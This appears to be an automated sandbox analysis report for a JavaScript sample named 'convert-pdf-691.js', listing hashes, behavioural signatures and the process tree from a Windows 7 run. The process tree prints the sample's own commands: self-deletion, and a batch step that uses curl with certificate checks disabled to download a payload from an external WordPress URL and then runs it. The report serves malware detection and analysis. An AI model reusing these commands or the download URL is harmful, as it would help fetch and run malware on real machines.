Analysis
-
max time kernel
120s -
max time network
130s -
platform
windows7_x64 -
resource
win7-20230831-en -
resource tags
arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system -
submitted
13-09-2023 10:33
Static task
static1
Behavioral task
behavioral1
Sample
convert-pdf-691.js
Resource
win7-20230831-en
General
-
Target
convert-pdf-691.js
-
Size
44KB
-
MD5
baab807d9799ba81b6cf672d75af688a
-
SHA1
5a6ebb01034e9ab3b719db948db259fe2fa2e84f
-
SHA256
ac99aa6b0162d71f33b1e9b286e9d0ed899ab449ac29040e494c4fb4b9b87d4d
-
SHA512
b06019d06c4945bf62ab2a8116b495d19e3fd95693550a66fa9304b3e193c04b3a4ed4e5b29123e42ab2aff4074f52d10709de5890ec1497c295dfc71e109c57
-
SSDEEP
384:/2eY5d0Bp7w2l/uYvxsDxb9Q5tbauRFvSefk1EK4s0QDQZWifIPguWYvLETAMg61:uTC3l2yDSef6EMveZgP8UJq58z293l
Malware Config
Signatures
-
Deletes itself 1 IoCs
Processes:
cmd.exepid process 2908 cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 9 IoCs
Processes:
wscript.exedescription pid process target process PID 1708 wrote to memory of 2908 1708 wscript.exe cmd.exe PID 1708 wrote to memory of 2908 1708 wscript.exe cmd.exe PID 1708 wrote to memory of 2908 1708 wscript.exe cmd.exe PID 1708 wrote to memory of 2796 1708 wscript.exe cmd.exe PID 1708 wrote to memory of 2796 1708 wscript.exe cmd.exe PID 1708 wrote to memory of 2796 1708 wscript.exe cmd.exe PID 1708 wrote to memory of 2748 1708 wscript.exe cmd.exe PID 1708 wrote to memory of 2748 1708 wscript.exe cmd.exe PID 1708 wrote to memory of 2748 1708 wscript.exe cmd.exe
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\convert-pdf-691.js1⤵
- Suspicious use of WriteProcessMemory
PID:1708 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\convert-pdf-691.js"2⤵
- Deletes itself
PID:2908 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c echo curl https://getdebtgo.com/wp-content/plugins/bluehost-wordpress-plugin/vendor/wpscholar/url/6006.7z --output "C:\Users\Admin\AppData\Local\Temp\voluptatum.h" --ssl-no-revoke --insecure --location > "C:\Users\Admin\AppData\Local\Temp\esse.i.bat"2⤵PID:2796
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\esse.i.bat"2⤵PID:2748
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
199B
MD52f4003de23fc616ebd1ca0e3730f9313
SHA185fe457b0a486c254f84a61a0b1a1375018320e3
SHA256220f6a2e691cd7f6ee1be619d45cb4ecebca6f59179ef9339a61ee2ddd40a48b
SHA5120131d0800aeef2a395d10daa8267496655ec03e3fdbf1ec0939fd99b914855275f6081b67faecb241f22c274238219934ba1f17e19066975dda0c6e698bede0e